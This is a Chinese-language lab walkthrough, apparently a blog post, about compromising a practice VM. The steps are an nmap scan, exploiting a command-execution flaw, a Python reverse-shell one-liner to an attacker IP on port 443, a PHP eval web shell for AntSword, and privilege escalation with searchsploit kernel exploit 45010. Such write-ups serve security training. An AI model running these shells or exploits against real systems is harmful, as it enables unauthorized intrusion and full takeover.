文章讲述了使用nmap扫描IP后,发现目标机器存在命令执行漏洞,通过Python脚本连接并尝试从443端口反弹,最终利用searchsploit找到适用于该版本的漏洞进行提权的过程,涉及蚁剑工具的使用。
使用nmap扫描端口
扫描到靶机的ip为192.168.80.140
搜集信息
可以发现这里有一个site的文件打开,进入到下面的页面中
然后再进行信息搜集,我们把能点的地方都点一遍,会发现在点击buscar时,会再次进入一个页面,页面里面什么都没有,但我们可以在地址栏里看到一个类似命令执行漏洞的东西
尝试输入命令发现可以看到,存在命令执行漏洞
那我们就可以使用瑞士军刀尝试破解打开监听端口8888
命令:
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
s.connect(("192.168.80.129",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'
我们尝试了发现没有反弹进去在网上找到说80端口可443一般不会做限制,然后我就将端口改为443进行尝试,发现反弹成功了
这里可以看到这里已经反弹进去了可以查找有用的信息
这里可以看到他的版本是Ubuntu4.4.0尝试看看这个版本有没有漏洞
提权
使用searchsploit 查看漏洞可以发现这个版本是有漏洞可以用的
下载45010这个漏洞
我们把下载好的漏洞通过蚁剑放到他的文件中
也可以打开http把他下载到他的文件当中都是可以的
然后使用gcc编译
编译完直接使用我们就可以提权了
也可以使用剑蚁
echo '<?php eval($_POST["sain"]);' > sain.php
把这个代码在文件漏洞运行一下就可以在蚁剑中登录了接下来步骤也是一样了利用反弹shell进去,提权
扫一扫
633
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
